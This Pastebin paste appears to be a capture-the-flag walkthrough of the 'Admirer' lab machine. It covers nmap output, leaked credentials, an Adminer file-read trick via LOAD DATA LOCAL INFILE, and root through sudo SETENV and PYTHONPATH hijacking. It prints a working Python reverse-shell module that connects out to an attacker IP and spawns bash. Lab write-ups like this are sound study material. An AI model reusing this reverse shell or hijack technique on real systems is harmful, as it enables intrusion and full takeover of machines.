Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Nmap 7.80 scan initiated Sat May 2 17:43:44 2020 as: nmap -sC -sV -oN nmap/admirer 10.10.10.187
- Nmap scan report for 10.10.10.187
- Host is up (0.26s latency).
- Not shown: 997 closed ports
- PORT STATE SERVICE VERSION
- 21/tcp open ftp vsftpd 3.0.3
- 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
- | ssh-hostkey:
- | 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
- | 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
- |_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
- 80/tcp open http Apache httpd 2.4.25 ((Debian))
- | http-robots.txt: 1 disallowed entry
- |_/admin-dir
- |_http-server-header: Apache/2.4.25 (Debian)
- |_http-title: Admirer
- Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- # Nmap done at Sat May 2 17:44:20 2020 -- 1 IP address (1 host up) scanned in 35.61 seconds
- Running gobuster donβt reveal much but before that itself i had opened http://10.10.10.187/robots.txt
- User-agent: *
- # This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
- Disallow: /admin-dir
- Following the waldo i download http://10.10.10.187/admin-dir/contacts.txt and http://10.10.10.187/admin-dir/credentials.txt which reveal the ftp password
- as
- ftpuser
- %n?4Wz}R$tTF7
- using that creds on ftp i downloaded html.tar.gz and dump.sql
- checking the html dump i saw something intresting in utility-scripts/db_admin.php
- <?php
- $servername = "localhost";
- $username = "waldo";
- $password = "Wh3r3_1s_w4ld0?";
- // Create connection
- $conn = new mysqli($servername, $username, $password);
- // Check connection
- if ($conn->connect_error) {
- die("Connection failed: " . $conn->connect_error);
- }
- echo "Connected successfully";
- // TODO: Finish implementing this or find a better open source alternative
- ?>
- also saw admin_tasks.php had
- <?php
- if($task == '1' || $task == '2' || $task == '3' || $task == '4' ||
- $task == '5' || $task == '6' || $task == '7')
- {
- echo str_replace("\n", "<br />", shell_exec("/opt/scripts/admin_tasks.sh $task 2>&1"));
- }
- else
- {
- echo("Invalid task.");
- }
- ?>
- but playing around a lot i was unable to bypass the if condition
- so i tried all the passwords i already had on ssh with all the username.
- http://10.10.10.187/utility-scripts/adminer.php
- reading on blog shows that we can connect mysql of our local hosted by me
- Dumping data to Table
- load data local infile '../index.php'
- into table data
- fields terminated by "\n"
- which dump index.php which have the dbpassword as &<h5b~yK3F#{PaPB&dA}{H>
- Using that on ssh for user waldo and using the db password we can get user shell
- and we have user.txt
- Privilege Escalation
- Running sudo -l
- Matching Defaults entries for waldo on admirer:
- env_reset, env_file=/etc/sudoenv, mail_badpass,
- secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
- User waldo may run the following commands on admirer:
- (ALL) SETENV: /opt/scripts/admin_tasks.sh
- we see we can run /opt/scripts/admin_tasks.sh reading the code
- #!/bin/bash
- view_uptime()
- {
- /usr/bin/uptime -p
- }
- view_users()
- {
- /usr/bin/w
- }
- view_crontab()
- {
- /usr/bin/crontab -l
- }
- backup_passwd()
- {
- if [ "$EUID" -eq 0 ]
- then
- echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
- /bin/cp /etc/passwd /var/backups/passwd.bak
- /bin/chown root:root /var/backups/passwd.bak
- /bin/chmod 600 /var/backups/passwd.bak
- echo "Done."
- else
- echo "Insufficient privileges to perform the selected operation."
- fi
- }
- backup_shadow()
- {
- if [ "$EUID" -eq 0 ]
- then
- echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
- /bin/cp /etc/shadow /var/backups/shadow.bak
- /bin/chown root:shadow /var/backups/shadow.bak
- /bin/chmod 600 /var/backups/shadow.bak
- echo "Done."
- else
- echo "Insufficient privileges to perform the selected operation."
- fi
- }
- backup_web()
- {
- if [ "$EUID" -eq 0 ]
- then
- echo "Running backup script in the background, it might take a while..."
- /opt/scripts/backup.py &
- else
- echo "Insufficient privileges to perform the selected operation."
- fi
- }
- backup_db()
- {
- if [ "$EUID" -eq 0 ]
- then
- echo "Running mysqldump in the background, it may take a while..."
- #/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql &
- /usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql &
- else
- echo "Insufficient privileges to perform the selected operation."
- fi
- }
- # Non-interactive way, to be used by the web interface
- if [ $# -eq 1 ]
- then
- option=$1
- case $option in
- 1) view_uptime ;;
- 2) view_users ;;
- 3) view_crontab ;;
- 4) backup_passwd ;;
- 5) backup_shadow ;;
- 6) backup_web ;;
- 7) backup_db ;;
- *) echo "Unknown option." >&2
- esac
- exit 0
- fi
- # Interactive way, to be called from the command line
- options=("View system uptime"
- "View logged in users"
- "View crontab"
- "Backup passwd file"
- "Backup shadow file"
- "Backup web data"
- "Backup DB"
- "Quit")
- echo
- echo "[[[ System Administration Menu ]]]"
- PS3="Choose an option: "
- COLUMNS=11
- select opt in "${options[@]}"; do
- case $REPLY in
- 1) view_uptime ; break ;;
- 2) view_users ; break ;;
- 3) view_crontab ; break ;;
- 4) backup_passwd ; break ;;
- 5) backup_shadow ; break ;;
- 6) backup_web ; break ;;
- 7) backup_db ; break ;;
- 8) echo "Bye!" ; break ;;
- *) echo "Unknown option." >&2
- esac
- done
- exit 0
- checking backup_web function we see that its running /opt/scripts/backup.py &
- backup_web()
- {
- if [ "$EUID" -eq 0 ]
- then
- echo "Running backup script in the background, it might take a while..."
- /opt/scripts/backup.py &
- else
- echo "Insufficient privileges to perform the selected operation."
- fi
- }
- and we see the python script
- #!/usr/bin/python3
- from shutil import make_archive
- src = '/var/www/html/'
- # old ftp directory, not used anymore
- #dst = '/srv/ftp/html'
- dst = '/var/backups/html'
- make_archive(dst, 'gztar', src)
- You have new mail in /var/mail/waldo
- seeing that we have SETENV so we can do some path hijack and PYTHONPATH variable and
- create a file as shutil.py and keep
- import os
- import pty
- import socket
- lhost = "10.10.14.174"
- lport = 4444
- ZIP_DEFLATED = 0
- class ZipFile:
- def close(*args):
- return
- def write(*args):
- return
- def __init__(self, *args):
- return
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((lhost, lport))
- os.dup2(s.fileno(),0)
- os.dup2(s.fileno(),1)
- os.dup2(s.fileno(),2)
- os.putenv("HISTFILE",'/dev/null')
- pty.spawn("/bin/bash")
- s.close()
- and running a nc listener and running
- sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6
- and we have root now :)
Add Comment
Please, Sign In to add comment